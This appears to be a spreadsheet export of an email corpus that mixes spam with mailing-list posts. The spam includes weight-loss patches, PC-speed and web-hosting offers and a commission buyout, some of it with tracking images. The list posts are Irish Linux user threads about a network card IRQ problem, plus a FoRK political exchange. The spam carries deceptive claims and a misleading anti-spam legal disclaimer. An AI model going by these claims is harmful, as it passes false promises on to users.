 ICAgICAgICAgPHRkIGJnY29sb3I9IiMwMDAwRkYiPiANCiAgICAgICAgICAgICAgPGRpdiBhbGln
 bj0iY2VudGVyIj48Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNl
 cmlmIiBzaXplPSIyIj48Yj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+U2VjdXJlUHJvIA0KICAgICAg
 ICAgICAgICAgIFRlY2hub2xvZ3kgU2VjdXJpdHkgU3lzdGVtIExpbWl0ZWQgOiBjb250YWN0IHVz
 IHRvZGF5IDogKDg1MiktMjY4MiANCiAgICAgICAgICAgICAgICAwMDg5IDogPC9mb250PjxhIGhy
 ZWY9Imh0dHA6Ly93d3cuc2VjdXJlcHJvLmNvbS5oayI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPmh0
 dHA6Ly93d3cuc2VjdXJlcHJvLmNvbS5oazwvZm9udD48L2E+IA0KICAgICAgICAgICAgICAgIDxm
 b250IGNvbG9yPSIjRkZGRkZGIj5FbWFpbDo8L2ZvbnQ+IDxhIGhyZWY9Im1haWx0bzppbmZvQHNl
 Y3VyZXByby5jb20uaGsiPjxmb250IGNvbG9yPSIjRkZGRkZGIj5pbmZvQHNlY3VyZXByby5jb20u
 aGs8L2ZvbnQ+PC9hPjwvYj48L2ZvbnQ+PC9kaXY+DQogICAgICAgICAgICA8L3RkPg0KICAgICAg
 ICAgIDwvdHI+DQogICAgICAgIDwvdGFibGU+DQogICAgICAgIDx0YWJsZSB3aWR0aD0iNjgwIiBi
 b3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQogICAgICAgICAgPHRy
 PiANCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iMjIiPiZuYnNwOzwvdGQ+DQogICAgICAgICAgICA8
 dGQgd2lkdGg9IjIwNyI+Jm5ic3A7PC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDUxIj4m
 bmJzcDs8L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAg
 IDx0ZCB3aWR0aD0iMjIiPiZuYnNwOzwvdGQ+DQogICAgICAgICAgICA8dGQgd2lkdGg9IjIwNyI+
 PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0i
 MiI+PGI+SGVhZHF1YXJ0ZXI8L2I+PC9mb250Pjxicj4NCiAgICAgICAgICAgICAgPGZvbnQgZmFj
 ZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+Um0uIA0K
 ICAgICAgICAgICAgICA1MTAsIDUvRiBGdWsgU2hpbmcgQ29tbS4gQmxkZy4sIE5vLjI4LCBPbiBM
 b2sgTXVuIFN0cmVldCwgT24gTG9rIA0KICAgICAgICAgICAgICBUc3VlbiwgRmFubGluZywgTi5U
 Liw8YnI+DQogICAgICAgICAgICAgIEhvbmcgS29uZzwvZm9udD48L3RkPg0KICAgICAgICAgICAg
 PHRkIHdpZHRoPSI0NTEiPiANCiAgICAgICAgICAgICAgPGRpdiBhbGlnbj0iY2VudGVyIj48Zm9u
 dCBzaXplPSI2IiBmYWNlPSJDb3VyaWVyIE5ldywgQ291cmllciwgbW9ubyI+RGlzdHJpYnV0b3Jz
 PC9mb250PjwvZGl2Pg0KICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAg
 ICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgY29sc3Bhbj0iMyI+Jm5ic3A7PC90ZD4NCiAgICAg
 ICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KICAgICAgICA8Zm9udCBzaXplPSIxIiBmYWNl
 PSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj48Yj5Db3B5cmlnaHQgMjAwMiBTZWN1cmVQ
 cm8gDQogICAgICAgIFRlY2hub2xvZ3kgU2VjdXJpdHkgU3lzdGVtIEx0ZC4gQWxsIHJpZ2h0IHJl
 c2VydmVkLiA8YnI+DQogICAgICAgIEpLNDAwLCBKSzgwMCwgSksxNjAwIGFyZSByZWdpc3RlcmVk
 IHRyYWtlbWFya3Mgb2YgU2VjdXJlUHJvIFRlY2hub2xvZ3kgDQogICAgICAgIFNlY3VyaXR5IFN5
 c3RlbSBMdGQuIEluIEhvbmcgS29uZy48L2I+PC9mb250PjwvZGl2Pg0KICAgIDwvdGQ+DQogIDwv
 dHI+DQo8L3RhYmxlPg0KPC9ib2R5Pg0KPC9odG1sPg==
 ------=_NextPart_lBwzzJ0s7cGEidV47BAA--
 ------=_NextPart_lBwzzJ0s7cGEidV47B--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: (SPAM? 08.00) example.sourceforge.net mailing list memberships reminder
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mystery Indian virus heading for Europe
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8668042,1440/
 Date: Not supplied
 The virus has wiped most of India's vultures, causing ecological havoc - 
 migrating birds could now carry it to Europe and Africa
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] (no subject)
</t>
  </si>
  <si>
    <t xml:space="preserve">the problem with yast2 comes when you try to install
 off a harddissssk, its like its already mounted it?
 http://digital.yahoo.com.au - Yahoo! Digital How To
 - Get the best out of your PC!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 On Sun, 4 Aug 2002, Albert White stated:
 &gt; Hi folks,
 &gt; 
 &gt; I decided to upgrade the kernel on a machine at home from 2.2.18pre21
 &gt; to the latest from kernel.org which is 2.4.19.
 &gt; 
 &gt; However I have encountered one problem, my network card now dosent
 &gt; work, well kind of dosent work...
 &gt; 
 &gt; Instead of one eth0 on IRQ 10 I now get:
 &gt; Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port,
 &gt; Aug  4 11:31:51 mira kernel: address 00 10 5a 3e 0e 48, IRQ 5.
 &gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 &gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 &gt; Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port,
 &gt; Aug  4 11:31:51 mira kernel: address 00 10 5a be 0e 48, IRQ 10.
 &gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 &gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 &gt; 
 &gt; This results in the interface(s) coming up but while packets can go
 &gt; out they can not come in.
 &gt; 
 &gt; I've tried not loading the 3c509 mdule on bootup and then `modload
 &gt; 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On
 &gt; 2.2 it loads to IRQ 10.
 &gt; 
 I have been unable to get the 3c509 to work with 2.4.19 with an IRQ of
 10 which works in 2.2.x okay. Can you use anyother irq for it.
 Sean
 - -- 
   Sean Rima                                http://www.tcob1.net
   Linux User:      231986          Jabber:   tcobone@jabber.org
   THE VIEWS EXPRESSED HERE ARE NOT NECESSARILY THOSE OF MY WIFE.
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Use GPG for Secure Mail
 iD8DBQE9TXFWHMnSWn2nApQRAg9VAKCOMO6oSAD8x6rkTl9QCvcD63vohACgtzPU
 GWvz7cAuETfHwCouOW0NNIY=
 =etR9
 -----END PGP SIGNATURE-----
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Papon release prompts healthy scepticism
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8523004,215/
 Date: 2002-10-03T18:31:00+01:00
 *Paris dispatch:* A growing number of French people are questioning the medical 
 ruling - and the law - that enabled a Vichy war criminal to walk free, writes *
 Jon Henley*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Guaranteed to lose 10-12 lbs in 30 days with Slim Patch                    10.24
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_26B382_01C24DC8.0B7C5210
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 1) Join the Web's Hottest &amp; Fastest Growing Community
 It Is So Hot! &lt;http://www.adclick.ws/p.cfm?o=259&amp;s=pk007&gt; 
 2) Guaranteed to lose 10-12 lbs in 30 days
 Slim Patch - Weight Loss Patches
 &lt;http://www.adclick.ws/p.cfm?o=249&amp;s=pk007&gt; 
 3) Get the Child Support You Deserve
 Free Legal Advice &lt;http://www.adclick.ws/p.cfm?o=245&amp;s=pk002&gt; 
 Have a Wonderful Day, 
 Offer Manager
  &lt;http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417&gt; 
 ------=_NextPart_000_26B382_01C24DC8.0B7C5210
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 1) Join the Web's Hottest &amp; Fastest Growing Community&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D259&amp;s=3Dpk007" =
 target=3D"_blank"&gt;It Is=20
   So Hot!&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   2) Guaranteed to lose 10-12 lbs in 30 days&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D249&amp;s=3Dpk007" =
 target=3D"_blank"&gt;Slim=20
   Patch - Weight Loss Patches&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   3) Get the Child Support You Deserve&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D245&amp;s=3Dpk002" =
 target=3D"_blank"&gt;Free=20
   Legal Advice&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
   Have a Wonderful Day, &lt;br&gt;
   Offer Manager&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;a =
 href=3D"http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417"&gt;&lt;img =
 border=3D"0" =
 src=3D"http://209.63.151.9/trim/?17%7C308236%7C6645"&gt;&lt;/a&gt;&lt;/center&gt;&lt;/body&gt;=
 &lt;/html&gt;
 ------=_NextPart_000_26B382_01C24DC8.0B7C5210--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 John Reilly &lt;jr@inconspicuous.org&gt; a crit:
 &gt; &gt; Newsgroups are great for threading of discussions,
 &gt; &gt; working offline and I feel that they work
 &gt; &gt; much better for this sort of technical discussion
 &gt; &gt; than a mailing list.
 &gt; I suppose its all down to personal preference, but I
 &gt; disagree strongly.
 I suppose it is - however, nobody knows that
 this message is a response to your one or a 
 follow-up to my own first message. 
 With a newsgroup structure, this is obvious. 
 This helps the reader eliminate threads which
 are irrelevant to them or whatever.
 Paul...
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Aug 04, 2002 at 06:55:49PM +0100, cout@eircom.net wrote:
 &gt; You need to run the dos setup program for the 3c509 and turn off plug 'n' play in the card's firmware I think you will find.
 or you could:
     a) make your lines less then 80 chars.
     b) not top-post.
     c) visit http://www.scyld.com/diag/ and turn off plug and play
        from a linux setup program.
     d) all of the above.
     moron) do none of the above.
 just a thought...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</si>
  <si>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
 &gt; For my part, I'd rather people didn't use FoRK as a place in which to dump an 
 &gt; expression of their political beliefs.
 I'll second that, although with emphasis
 upon /dump/, rather than on /political/.
 I don't mind if people advocate nuking
 gay baby whales for jesus, if they can
 make a good, original, argument for it.
 I do mind if someone should attempt to
 further the notion that 1+1=2, merely
 by cut-and-pasting a few pages of W&amp;R.
 "New bits" are not a temporal property;
 we create them when we add context or
 clarification to the old bits of others'
 thoughts.
 -Dave
 ::::::::::::
 &gt;     ... being rude and disrespectful is not the way to influence 
 &gt; politicians, but the standard way of using lobbyists and
 &gt; writing checks is beyond many of us.
 The standard way has some extreme precedents:
 &gt; Q: When was the Roman empire sold, and who bought it?
 &gt;
 &gt; A: On March 28th, 193 AD, the Roman empire was auctioned off by the
 &gt; Praetorian guards to the wealthy senator Didius Julianus for the price
 &gt; of 6250 drachms per soldier.
 (as found in &lt;http://math.ucr.edu/home/baez/puzzles/5.html&gt;,
 quoting Gibbon)
 Now, an economist might argue that selling
 offices is the most efficient way to fill
 them (what would Coase say?), but wouldn't
 that convince everyone (but the supporters
 of plutocracy) that efficiency is not the
 primary virtue of politics?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Double The Speed of Your Computer!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Double the Speed of Your Computer!&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;table width="417" border="0" cellspacing="0" cellpadding="0" height="359" align="center"&gt;
 	&lt;tr&gt; 
 		&lt;td colspan="2" rowspan="2" width="11" height="10"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_top_lft.gif" width="11" height="10"&gt;&lt;/td&gt;
 		&lt;td width="394" height="2" bgcolor="#999999"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="1" height="2"&gt;&lt;/td&gt;
 		&lt;td colspan="2" rowspan="2" width="11" height="10"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_top_rt.gif" width="11" height="10"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt; 
 		&lt;td width="394" height="8"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="1" height="8"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt; 
 		&lt;td rowspan="3" width="2" bgcolor="#999999"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="2" height="1"&gt;&lt;/td&gt;
 		&lt;td width="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="9" height="1"&gt;&lt;/td&gt;
 		&lt;td width="394" height="66" align="center" valign="middle"&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2qe5.1.i78.fsi52"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_hdr.gif" width="394" height="25" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 		&lt;td width="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="9" height="1"&gt;&lt;/td&gt;
 		&lt;td rowspan="3" width="2" bgcolor="#999999"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="2" height="1"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt; 
 		&lt;td colspan="3" width="412" height="2" bgcolor="#999999"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="1" height="2"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt; 
 		&lt;td width="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="9" height="1"&gt;&lt;/td&gt;
 		&lt;td width="394" align="left" valign="top" height="278"&gt;
 			&lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
 				&lt;tr&gt; 
 					&lt;td width="223"&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2qe5.2.i78.fsi52"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_no.gif" width="223" height="210" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;td width="171"&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2qe5.3.i78.fsi52"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_computer.jpg" width="171" height="210" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td align="left" valign="top"&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2qe5.4.i78.fsi52"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_click.gif" width="223" height="38" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;td align="left" valign="top"&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2qe5.5.i78.fsi52"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_url.gif" width="171" height="23" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/td&gt;
 		&lt;td width="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="9" height="1"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt; 
 		&lt;td colspan="2" rowspan="2" width="11" height="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_btn_lft.gif" width="11" height="11"&gt;&lt;/td&gt;
 		&lt;td width="394" height="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="1" height="9"&gt;&lt;/td&gt;
 		&lt;td colspan="2" rowspan="2" width="11" height="9"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/dps_btn_rt.gif" width="11" height="11"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt; 
 		&lt;td width="394" height="2" bgcolor="#999999"&gt;&lt;img src=" http://www.bd12.com/doublepcspeed/spacer.gif" width="1" height="2"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;!-- insert unsub information --&gt;
 &lt;table width="417" border="0" cellspacing="0" cellpadding="0"&gt;
 	&lt;tr&gt;
 		&lt;td&gt; &lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;HTML&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=2 CELLPADDING=3 BORDER=0&gt;
 &lt;FORM METHOD=GET ACTION="http://i.mb00.net/cgi-bin/pmg_subscribe.pl"&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#DDDDDD"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;I&gt;Remove yourself from this list by either:&lt;/I&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Entering your email address below and clicking REMOVE:&lt;BR&gt;
     &lt;CENTER&gt;
     &lt;INPUT TYPE="hidden" NAME="list" VALUE="ebargains:*"&gt;
     &lt;INPUT TYPE="hidden" NAME="server_action" VALUE="Unsubscribe"&gt;
     &lt;INPUT TYPE="text" NAME="email_address" VALUE="cypherpunks@einstein.ssz.com" SIZE=25&gt;&lt;/FONT&gt;
     &lt;INPUT TYPE="submit" VALUE="REMOVE"&gt;
     &lt;/CENTER&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;B&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/B&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Reply to this message with the word &amp;quot;remove&amp;quot; in the subject line.
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/FORM&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD BGCOLOR="#FFFFFF" ALIGN="CENTER"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#000000"&gt;
   This message was sent to address cypherpunks@einstein.ssz.com
   &lt;/FONT&gt;
 &lt;!--
 X-PMG-Recipient: cypherpunks@einstein.ssz.com
 X-PMG-Msgid: 1027370746.6389
 X-PMG-Userid: ebargains:*
 --&gt;
 &lt;DIV ALIGN="CENTER"&gt;
 &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#AAAAAA"&gt;pmguid:1dx.2qe5.fsi52&lt;/FONT&gt;&lt;/DIV&gt;&lt;BR CLEAR="ALL"&gt;
 &lt;IMG SRC="http://r.mb00.net/s/o?1dx.2qe5.0.fsi52" WIDTH=33 HEIGHT=12 BORDER=0 ALIGN="RIGHT" ALT="pmg"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;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</si>
  <si>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Hi,
 Thanks for the replies. It turns out that it was an IRQ conflict with an old 
 sound card.
 Despite checking the BIOS and running the 3c509 setup utility on 
 http://www.scyld.com/diag, the 2.4 kernel still picked a card on IRQ 5 and 10.
 It works fine now that the sound card is removed, but I'm still confused as to 
 why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...
 Thanks again,
 Cheers,
 ~Al
 Original question:
 &gt; Hi folks,
 &gt; 
 &gt; I decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.
 &gt; 
 &gt; However I have encountered one problem, my network card now dosent work, well kind of dosent work...
 &gt; 
 &gt; Instead of one eth0 on IRQ 10 I now get:
 &gt; Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.
 &gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 &gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 &gt; Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.
 &gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 &gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 &gt; 
 &gt; This results in the interface(s) coming up but while packets can go out they can not come in.
 &gt; 
 &gt; I've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.
 &gt; 
 &gt; Anyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?
 &gt; 
 &gt; Cheers,
 &gt; ~Al
 -- 
 Expressed in this posting are my opinions.  They are in no way related
 to opinions held by my employer, Sun Microsystems.
 Statements on Sun products included here are not gospel and may
 be fiction rather than truth.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YES $0.04 per day webhosting.                     17897
</t>
  </si>
  <si>
    <t xml:space="preserve">Want the most bang for your buck? Take your web site to the next level with a fast, powerful and yes cheap web hosting account.
 We targeted mainly to self-employed individuals and small companies on a budget which aren't going to pay inflated  prices for webhosting.
 Just getting started with a web site? Ready to host with your own domain name - www.mysite.com? 
 Maybe, you already have a website and you are tired of paying too much for hosting? 
 Starting as low as $0.04/day PLUS FREE Setup and one Month Hosting for FREE
 Check it out now @ http://srd.yahoo.com/drst/20834/*http://www.fabulousmessage.com/cgi-bin/enter.cgi?marketing_id=fab002
 This email was sent to you because your email is part of a targeted opt-in list. If you do not wish to receive further mailings from this offer, please click below and enter your email to remove your email from future offers.
 ****************************************************************
 Anti-SPAM Policy Disclaimer: Under Bill s.1618 Title III passed by the 105th U. S. Congress, mail cannot be considered spam as long as we include contact information and a remove link for removal from this mailing list. If this e-mail is unsolicited, please accept our apologies. Per the proposed H.R. 3113 Unsolicited Commercial Electronic Mail Act of 2000, further transmissions to you by the sender may be stopped at NO COST to you 
 **************************************************************** 
 Click to remove @ http://srd.yahoo.com/drst/20834/*http://www.spambites.com/cgi-bin/enter.cgi?spambytes_id=1214578
 **************************************************************** 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We Buy Renewal Commissions
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C255BB.E99F1F00
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  If you need capital for your business or want to know how much it's
 worth,
  Call Us Today!
 Tap the hidden value of your business 
 and get the cash you need today.
 You've got money coming to you. But because it's in the form of renewal
 commissions, it comes slowly. A little every year.
 We're TWG Capital. We help turn your renewal commissions into immediate
 cash - cash you can use any way you see fit. We are currently purchasing
 renewal commissions from the following product lines: Long Term Care,
 Medicare Supplement, Specified Disease, Life, and Health insurance.
 For a free evaluation, call or e-mail Todd Rooks
 &lt;mailto:todd_rooks@twg-capital.com?subject=IQ TWG Inquiry&gt;  today!
  866-903-1700 ext. 203
 ? or ?
 Please fill out the form below for more information	 
 Name:	 	  	
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	 
  TWG Capital Financial Professionals
 http://www.twg-capital.com &lt;http://www.twg-capital.com&gt; 
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_0007_01C255BB.E99F1F00
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;We Buy Renewal Commissions&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" =
 border=3D"0"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/twg/20020802-101.gif" =
 width=3D"550" height=3D"63" alt=3D"If you need capital for your business =
 or want to know how much it's worth,"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/twg/20020802-102.gif" =
 width=3D"550" height=3D"90" alt=3D"Call Us Today!"&gt;&lt;br&gt;
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"285" height=3D"258"&gt;&lt;font size=3D"2"&gt;=20
             &lt;p align=3D"center"&gt;&lt;b&gt;Tap the hidden value of your business =
 &lt;br&gt;
               and get the cash you need today.&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;You've got money coming to you. But because it's in the =
 form of=20
               renewal commissions, it comes slowly. A little every =
 year.&lt;/p&gt;
             &lt;p&gt;We're &lt;b&gt;&lt;font color=3D"#006600"&gt;TWG Capital&lt;/font&gt;&lt;/b&gt;. =
 We help=20
               turn your renewal commissions into immediate cash - cash =
 you can=20
               use any way you see fit. We are currently purchasing =
 renewal commissions=20
               from the following product lines: Long Term Care, Medicare =
 Supplement,=20
               Specified Disease, Life, and Health insurance.&lt;/p&gt;
             &lt;/font&gt;
           &lt;/td&gt;
           &lt;td align=3D"right" valign=3D"bottom" width=3D"265"&gt;&lt;img =
 src=3D"http://iiq.us/images/twg/20020802-2.jpg" width=3D"244" =
 height=3D"243"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td colspan=3D"2" align=3D"center"&gt;&lt;br&gt;
             &lt;b&gt;&lt;font size=3D"2"&gt;For a free evaluation, call or e-mail &lt;a =
 href=3D"mailto:todd_rooks@twg-capital.com?subject=3DIQ TWG =
 Inquiry"&gt;&lt;font color=3D"#009900"&gt;Todd=20
             Rooks&lt;/font&gt;&lt;/a&gt; today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/twg/20020802-3.gif" =
 width=3D"531" height=3D"91" alt=3D"866-903-1700 ext. 203"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
